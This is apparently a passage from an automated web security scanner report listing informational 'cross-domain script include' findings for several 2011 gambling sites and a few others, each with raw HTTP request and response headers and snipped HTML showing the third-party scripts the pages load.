<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.161. https://www.norskelodd.com/no/play/7thHeaven

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/play/7thHeaven

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/play/7thHeaven HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:02:04 GMT
Connection: close
Content-Length: 100366
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.162. https://www.norskelodd.com/no/play/GonzosQuest

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/play/GonzosQuest

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/play/GonzosQuest HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:47 GMT
Connection: close
Content-Length: 100369
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.163. https://www.norskelodd.com/no/promotions/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/promotions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /no/promotions/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:30 GMT
Connection: close
Content-Length: 101653
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...
<!-- dfCoreRootJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreRootJavascriptLib_v8160.js"></script>
...[SNIP]...
<!-- dfjQueryJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_jQueryJavaScriptLib_v8594.js"></script>
...[SNIP]...
<!-- dfWhiteLabelJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_WLJavascriptLib_v25668.js"></script>
...[SNIP]...
<!-- CoreJavaScript -->
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/ne/NorgesLoddet/no/df_CoreJavascriptLib_v27275.js"></script>
...[SNIP]...

19.164. http://www.ok.co.uk/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ok.co.uk
Path:   /home/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/ HTTP/1.1
Host: www.ok.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:37:25 GMT
Server: Apache
MS-Author-Via: DAV
Connection: close
Content-Type: text/html
Content-Length: 64992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.sublimemedia.net/sublimemedia/sublimemedia.aspx?referId=10843"></script>
...[SNIP]...
<input type="submit" class="submit" value="" />
    <script type="text/javascript" src="http://www.google.co.uk/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="boxBody">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://cloud.topfox.co.uk/a/site/43/htmlTopPrizes.1288882172617.js"></script>
...[SNIP]...
<div class="boxBody">
<script src="http://widgets.twimg.com/j/2/widget.js" type="text/javascript"></script>
...[SNIP]...
<input type="submit" class="submit" value="" />
    <script type="text/javascript" src="http://www.google.co.uk/coop/cse/brand?form=cse-search-box-foot&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://loadeu.exelator.com/load/?p=261&g=003&c=23706&ctg=Home"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://p.ctasnet.com/partners/universal/in?pid=147"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.sublimemedia.net/sublimemedia/sublimemedia.aspx?referId=10842" type="text/javascript"></script>
...[SNIP]...

19.165. http://www.okscratchcards.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12080
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 11:37:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js" type="text/javascript"></script>
...[SNIP]...

19.166. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=51jln3d46i68pj609s4i8oat56; expires=Wed, 08-Jun-2011 16:18:37 GMT; path=/; domain=.opensource.org
Last-Modified: Mon, 16 May 2011 12:32:15 GMT
ETag: "683ef92c05accf8dc3002cfa2d153539"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.167. http://www.primegrattage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primegrattage.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Content-Length: 27400
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=NDANCHNDBOKGLAFOAPEGFKFJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- performance next / CPL / 7/20/2010 -->
<script src="http://nxtck.com/act.php?zid=16677"></script>
...[SNIP]...

19.168. http://www.vincite.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vincite.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=v0b5gg3j3lfm7o3fa7sric4bp6; path=/; domain=.vincite.net
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
Set-Cookie: winnings[subdomain]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[lang]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[sessionId]=103122908; path=/; domain=.vincite.net
Set-Cookie: winnings[vid]=540294; expires=Tue, 15-May-2012 12:02:13 GMT; path=/; domain=.vincite.net
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:02:14 GMT
Connection: close
Content-Length: 23217

<!DOCTYPE html>
<html dir="ltr" lang="it-IT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La prima destinazione per vincere divertendosi online!..| Winnings.com</title>
<link rel="alt
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="..| Winnings.com &raquo; Feed dei commenti" href="http://it.winnings.com/comments/feed" />
<script type='text/javascript' src='http://winnings.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="pingback" href="http://it.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.169. http://www.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.winnings.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=4ghnev4ktomhtdlm6482aj6993; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 11:41:05 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 11:41:05 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103122734; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540130; expires=Tue, 15-May-2012 11:41:07 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 11:41:07 GMT
Content-Length: 24501

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - The #1 Destination for FUN Online Winnings Entertainment!..| Winnings.com</title>
<link rel=
...[SNIP]...
<link rel="pingback" href="http://www.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.170. http://www.winnings.com/how-to-win-money

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /how-to-win-money

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /how-to-win-money HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:29 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:29 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:32 GMT
Connection: close
Content-Length: 22260

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Cash Prizes - Learn how to make money online | H
...[SNIP]...
<link rel="pingback" href="http://www.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.171. http://www.winnings.com/instant-games

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /instant-games

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /instant-games HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:11 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:11 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:13 GMT
Connection: close
Content-Length: 24524

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Money Games Online ... Instant Win Games - Win Real Money..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
<link rel="pingback" href="http://www.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.172. http://www.winnings.com/lottery-scratch-cards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /lottery-scratch-cards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery-scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:35 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:35 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:36 GMT
Connection: close
Content-Length: 22417

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>Lottery scratch cards - Lottery Scratchcards Gam
...[SNIP]...
<link rel="pingback" href="http://www.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.173. http://www.winnings.com/scratch-cards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /scratch-cards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /scratch-cards HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:14 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:14 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:16 GMT
Connection: close
Content-Length: 24845

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Online Scratch Cards ... Scratch and Win Huge Cash Prizes..| Winnings.com</title>
<link rel="alternate" type
...[SNIP]...
<link rel="pingback" href="http://www.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.174. http://www.winnings.com/site-map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /site-map

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /site-map HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:32 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:32 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:34 GMT
Connection: close
Content-Length: 18713

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title> Site map..| Winnings.com</title>
<link rel="a
...[SNIP]...
<link rel="pingback" href="http://www.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.175. http://www.winnings.com/slots

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winnings.com
Path:   /slots

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /slots HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:15 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:17 GMT
Connection: close
Content-Length: 24715

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Play Online Slots ... Fruit machines, Video slots and more. Win huge cash prizes, playing online slots at Win
...[SNIP]...
<link rel="pingback" href="http://www.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.176. http://www.youtube.com/user/CrazyScratchCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /user/CrazyScratchCom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmpGMkpmS0VXa1VnRXBhekJpVlNscGE1Qk9SUzZoUG5wc3hvU3dmRHVtcUt3 -->
<head>



...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vfl80tF0w.js"></script>
...[SNIP]...
</script>


